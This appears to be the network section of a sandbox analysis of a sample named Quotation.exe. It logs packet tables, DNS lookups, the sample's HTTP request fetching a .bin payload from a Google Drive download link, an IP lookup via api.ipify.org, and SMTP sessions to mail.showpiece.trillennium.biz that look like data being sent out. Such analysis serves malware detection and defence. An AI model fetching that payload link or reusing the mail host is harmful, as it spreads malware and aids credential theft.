Nov 1, 2024 20:29:58.714087009 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.714150906 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.714174986 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.714226961 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.714518070 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.714570045 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.714679956 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.714729071 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.716444016 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.716497898 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.716567993 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.716615915 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.719599009 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.719650984 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.719692945 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.719749928 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.722459078 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.722515106 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.722565889 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.722615957 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.725720882 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.725775003 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.725816965 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.725872040 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.728494883 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.728552103 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.728595972 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.728655100 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.732403040 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.732454062 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.732462883 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.732498884 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.734524965 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.734575033 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.734581947 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.734621048 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.737152100 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.737194061 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.737360001 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.737406969 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.740338087 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.740391016 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.740398884 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.740437031 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.743063927 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.743143082 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.743149996 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.743189096 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.746112108 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.746162891 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.746171951 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.746210098 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.748647928 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.748701096 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.748816967 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.748863935 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.751692057 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.751743078 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.751750946 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.751795053 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.754203081 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.754251003 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.754256964 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.754296064 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.757232904 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.757292986 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.757374048 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.757422924 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.760157108 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.760215998 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.760356903 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.760411978 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.762630939 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.762685061 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.762789965 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.762833118 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.765288115 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.765336990 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.765347958 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.765393019 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.767703056 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.767749071 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.767759085 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.767802000 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.771439075 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.771502018 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.771507978 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.771558046 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.771564007 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.771610975 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.776612997 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.776670933 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.776678085 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.776720047 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.833977938 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834073067 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834081888 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834094048 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834136963 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834145069 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834187031 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834192038 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834228992 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834233999 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834276915 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834286928 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834333897 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834347010 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834388971 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834393978 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834439993 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834445953 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834486961 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834692001 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834738970 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834748030 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834790945 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834795952 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834837914 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.834842920 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.834881067 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.835095882 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.835145950 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.835151911 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.835196018 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.835201025 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.835242033 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.835273027 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.835326910 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.835472107 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.835519075 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.835525036 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.835572004 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.836831093 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.836909056 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.836913109 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.836927891 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.836950064 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.836975098 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.839426994 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.839603901 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.839612007 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.839653015 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.843188047 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.843244076 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.843250990 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.843291998 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.845460892 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.845515966 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.845607996 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.845652103 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.849306107 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.849364996 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.849371910 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.849427938 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.851645947 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.851696014 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.851702929 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.851746082 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.855487108 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.855539083 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.855547905 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.855601072 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.855638981 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.855684042 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.855690002 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.855731010 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.857455015 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.857517004 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.857589006 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.857644081 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.860315084 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.860364914 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.860373020 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.860415936 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.863266945 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.863325119 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.863331079 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.863375902 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.866153955 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.866194010 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.866199970 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.866239071 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.866271973 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.866317034 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.866367102 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:59.615150928 CET	49827	443	192.168.2.4	104.26.13.205
Nov 1, 2024 20:29:59.615194082 CET	443	49827	104.26.13.205	192.168.2.4
Nov 1, 2024 20:29:59.615272045 CET	49827	443	192.168.2.4	104.26.13.205
Nov 1, 2024 20:29:59.637900114 CET	49827	443	192.168.2.4	104.26.13.205
Nov 1, 2024 20:29:59.637933016 CET	443	49827	104.26.13.205	192.168.2.4
Nov 1, 2024 20:30:00.264724016 CET	443	49827	104.26.13.205	192.168.2.4
Nov 1, 2024 20:30:00.264811039 CET	49827	443	192.168.2.4	104.26.13.205
Nov 1, 2024 20:30:00.267024994 CET	49827	443	192.168.2.4	104.26.13.205
Nov 1, 2024 20:30:00.267035007 CET	443	49827	104.26.13.205	192.168.2.4
Nov 1, 2024 20:30:00.267379045 CET	443	49827	104.26.13.205	192.168.2.4
Nov 1, 2024 20:30:00.277883053 CET	49827	443	192.168.2.4	104.26.13.205
Nov 1, 2024 20:30:00.323333979 CET	443	49827	104.26.13.205	192.168.2.4
Nov 1, 2024 20:30:00.463321924 CET	443	49827	104.26.13.205	192.168.2.4
Nov 1, 2024 20:30:00.463397026 CET	443	49827	104.26.13.205	192.168.2.4
Nov 1, 2024 20:30:00.463648081 CET	49827	443	192.168.2.4	104.26.13.205
Nov 1, 2024 20:30:00.504600048 CET	49827	443	192.168.2.4	104.26.13.205
Nov 1, 2024 20:30:03.021519899 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:03.026555061 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:03.028234005 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:03.735570908 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:03.735874891 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:03.741355896 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:03.888665915 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:03.888906002 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:03.893754005 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.044675112 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.045188904 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:04.050038099 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.224241018 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.224257946 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.224276066 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.224286079 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.224297047 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.224368095 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:04.224443913 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:04.239200115 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:04.247096062 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.392684937 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.395684958 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:04.400631905 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.546936989 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.548000097 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:04.553978920 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.701054096 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.701333046 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:04.706711054 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.863466978 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:04.863811016 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:04.868797064 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:05.064841986 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:05.065177917 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:05.070400000 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:05.220427036 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:05.220676899 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:05.226774931 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:05.374537945 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:05.375292063 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:05.375358105 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:05.375380993 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:05.375396967 CET	49845	587	192.168.2.4	67.23.226.139
Nov 1, 2024 20:30:05.380234957 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:05.380251884 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:05.531426907 CET	587	49845	67.23.226.139	192.168.2.4
Nov 1, 2024 20:30:05.586956024 CET	49845	587	192.168.2.4	67.23.226.139

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 20:29:52.633655071 CET	64366	53	192.168.2.4	1.1.1.1
Nov 1, 2024 20:29:53.364273071 CET	53	64366	1.1.1.1	192.168.2.4
Nov 1, 2024 20:29:54.726584911 CET	61026	53	192.168.2.4	1.1.1.1
Nov 1, 2024 20:29:54.738903999 CET	53	61026	1.1.1.1	192.168.2.4
Nov 1, 2024 20:29:59.602520943 CET	53654	53	192.168.2.4	1.1.1.1
Nov 1, 2024 20:29:59.611372948 CET	53	53654	1.1.1.1	192.168.2.4
Nov 1, 2024 20:30:02.377861023 CET	58387	53	192.168.2.4	1.1.1.1
Nov 1, 2024 20:30:03.016864061 CET	53	58387	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2024 20:29:52.633655071 CET	192.168.2.4	1.1.1.1	0x64a6	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:29:54.726584911 CET	192.168.2.4	1.1.1.1	0xd3ff	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:29:59.602520943 CET	192.168.2.4	1.1.1.1	0xe378	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:30:02.377861023 CET	192.168.2.4	1.1.1.1	0xa556	Standard query (0)	mail.showpiece.trillennium.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 1, 2024 20:29:53.364273071 CET	1.1.1.1	192.168.2.4	0x64a6	No error (0)	drive.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:29:54.738903999 CET	1.1.1.1	192.168.2.4	0xd3ff	No error (0)	drive.usercontent.google.com		142.250.185.129	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:29:59.611372948 CET	1.1.1.1	192.168.2.4	0xe378	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:29:59.611372948 CET	1.1.1.1	192.168.2.4	0xe378	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:29:59.611372948 CET	1.1.1.1	192.168.2.4	0xe378	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 1, 2024 20:30:03.016864061 CET	1.1.1.1	192.168.2.4	0xa556	No error (0)	mail.showpiece.trillennium.biz	showpiece.trillennium.biz		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 20:30:03.016864061 CET	1.1.1.1	192.168.2.4	0xa556	No error (0)	showpiece.trillennium.biz		67.23.226.139	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49794	172.217.18.14	443	8048	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:29:54 UTC	216	OUT	GET /uc?export=download&id=1WXkRh02qszeOYcJVHlzPfWfZTAlXiW_T HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-11-01 19:29:54 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 01 Nov 2024 19:29:54 GMT Location: https://drive.usercontent.google.com/download?id=1WXkRh02qszeOYcJVHlzPfWfZTAlXiW_T&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-EPKkQteV3L3I_Xfu4Vi7zQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49801	142.250.185.129	443	8048	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:29:55 UTC	258	OUT	GET /download?id=1WXkRh02qszeOYcJVHlzPfWfZTAlXiW_T&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-11-01 19:29:58 UTC	4929	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="IoCcCnUsOnaPoCYMjQvR112.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 240192 Last-Modified: Thu, 31 Oct 2024 23:37:32 GMT X-GUploader-UploadID: AHmUCY0A6VHV71ar1wDPc7_EjbmbiXpaTVPm807E9jGS5ih1_pr9EbAvXDcoNTF6Ehse5LzS6yEX8fSw_g Date: Fri, 01 Nov 2024 19:29:58 GMT Expires: Fri, 01 Nov 2024 19:29:58 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=9PKxfA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
